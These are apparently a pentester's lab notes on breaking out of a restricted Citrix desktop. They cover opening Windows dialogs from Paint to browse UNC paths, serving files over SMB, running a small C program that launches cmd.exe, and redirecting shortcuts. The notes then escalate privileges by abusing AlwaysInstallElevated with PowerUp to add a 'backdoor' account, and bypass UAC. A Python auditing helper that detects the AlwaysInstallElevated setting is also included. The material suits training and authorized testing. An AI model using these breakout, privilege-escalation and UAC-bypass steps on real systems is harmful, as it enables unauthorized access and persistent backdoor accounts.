Citrix Breakout
Install Citrix Receiver
Download Debian package
osboxes@osboxes:~/Downloads$ sudo chmod 644 icaclient_24.5.0.76_amd64.deb
osboxes@osboxes:~/Downloads$ sudo apt install -f ./icaclient_24.5.0.76_amd64.deb
If "Network data corrupted - HDX has detected corrupted server data, session can not continue":

Use an older Citrix receiver version:
$ wget https://deb.gymkirchenfeld.ch/pool/main/i/icaclient/icaclient_23.5.0.58_amd64.deb
$ sudo chmod 644 icaclient_23.5.0.58_amd64.deb
$ sudo dpkg -i /home/osboxes/Downloads/icaclient_23.5.0.58_amd64.deb
Breakout
Features like Save, Save As, Open, Load, Browse, Import, Export, Help, Search, Scan, and Print usually provide an attacker with an opportunity to invoke a Windows dialog box. There are multiple ways to open a dialog box in Windows using tools such as Paint, Notepad, WordPad, etc.
With Paint
Run Paint from the Start menu and click File > Open to open the dialog box.

With the Windows dialog box open for Paint, enter the UNC path \\127.0.0.1\c$\users\pmorgan in the File name field, with File Type set to All Files; on hitting Enter we gain access to the desired directory.
Create .bat file
Accessing an SMB share from the restricted environment (host the share with smbserver.py):
smbserver.py -smb2support share $(pwd)


Right-click on the pwn.exe binary and select Open, which should prompt us to run it; a cmd console will then be opened.
pwn.exe:
#include <stdlib.h>

int main(void) {
    /* Spawn an interactive cmd.exe from the restricted session */
    system("C:\\Windows\\System32\\cmd.exe");
    return 0;
}
Use Explorer++ to copy files from the \\10.13.38.95\share location to the Desktop belonging to the user pmorgan.
Being a portable application, it can be executed directly without the need for installation
Alternate Registry Editors
Alternative registry editors can be employed to bypass the standard group policy restrictions. SimpleRegedit, UberRegedit and SmallRegistryEditor are examples of such GUI tools.
Modify existing shortcut file
Change the target of an existing shortcut file to C:\Windows\System32\cmd.exe

Other options: transfer an existing shortcut file using an SMB server. Alternatively, create a new shortcut file using PowerShell.
Script Execution
Create a new text file and name it "evil.bat".
Open "evil.bat" with a text editor such as Notepad.
Input the command "cmd" into the file.

Escalating Privileges
Use WinPEAS or PowerUp to check for AlwaysInstallElevated:
C:\> reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
HKEY_CURRENT_USER\SOFTWARE\Policies\Microsoft\Windows\Installer
AlwaysInstallElevated REG_DWORD 0x1
C:\> reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer
AlwaysInstallElevated REG_DWORD 0x1
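The policy only takes effect when both the HKLM and the HKCU value are set to 1, so a single hive reporting 0x1 is not enough. As an added auditing helper (not part of the original notes), the Python below parses captured output of the two reg query commands above and reports whether the setting is actually effective; the sample strings are constructed to mirror the output shown here, including the error line reg.exe prints when the key is absent.

```python
import re

# Constructed sample output, mirroring the two `reg query` commands above.
# Both hives report 0x1, so the policy is effective on this host.
SAMPLE_ENABLED = {
    "HKCU": (
        "\r\nHKEY_CURRENT_USER\\SOFTWARE\\Policies\\Microsoft\\Windows\\Installer\r\n"
        "    AlwaysInstallElevated    REG_DWORD    0x1\r\n"
    ),
    "HKLM": (
        "\r\nHKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\Installer\r\n"
        "    AlwaysInstallElevated    REG_DWORD    0x1\r\n"
    ),
}

# Constructed: HKLM is set but the HKCU key does not exist (reg.exe prints an
# error instead of a value), so the policy is NOT effective for this user.
SAMPLE_PARTIAL = {
    "HKCU": "ERROR: The system was unable to find the specified registry key or value.\r\n",
    "HKLM": SAMPLE_ENABLED["HKLM"],
}

# reg.exe prints the value as:  <name>    REG_DWORD    0x<hex>
VALUE_RE = re.compile(
    r"^\s*AlwaysInstallElevated\s+REG_DWORD\s+(0x[0-9a-fA-F]+)\s*$", re.MULTILINE
)


def parse_flag(reg_output: str) -> bool:
    """True only if the output shows AlwaysInstallElevated as a non-zero DWORD.
    A missing key, a zero value or an error line all count as 'not set'."""
    match = VALUE_RE.search(reg_output)
    return match is not None and int(match.group(1), 16) != 0


def always_install_elevated_state(outputs: dict) -> dict:
    """outputs maps 'HKCU' / 'HKLM' to the raw text of the reg query command.
    The misconfiguration is only effective when BOTH hives are set to 1."""
    hkcu = parse_flag(outputs.get("HKCU", ""))
    hklm = parse_flag(outputs.get("HKLM", ""))
    return {"HKCU": hkcu, "HKLM": hklm, "effective": hkcu and hklm}


def finding(outputs: dict) -> str:
    """One-line audit verdict with the remediation to apply."""
    state = always_install_elevated_state(outputs)
    if state["effective"]:
        return "FAIL: AlwaysInstallElevated is effective (HKLM and HKCU both 0x1); set both to 0 via policy"
    return "PASS: AlwaysInstallElevated is not effective (HKCU=%s, HKLM=%s)" % (state["HKCU"], state["HKLM"])


if __name__ == "__main__":
    print(finding(SAMPLE_ENABLED))
    print(finding(SAMPLE_PARTIAL))
```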
PS C:\Users\pmorgan\Desktop> Import-Module .\PowerUp.ps1
PS C:\Users\pmorgan\Desktop> Write-UserAddMSI
Output Path
-----------
UserAdd.msi

C:\> runas /user:backdoor cmd
Enter the password for backdoor: T3st@123
Attempting to start cmd as user "VDESKTOP3\backdoor" ...
Bypass UAC
C:\Windows\system32> cd C:\Users\Administrator
Access is denied.
PS C:\Users\Public> Import-Module .\Bypass-UAC.ps1
PS C:\Users\Public> Bypass-UAC -Method UacMethodSysprep
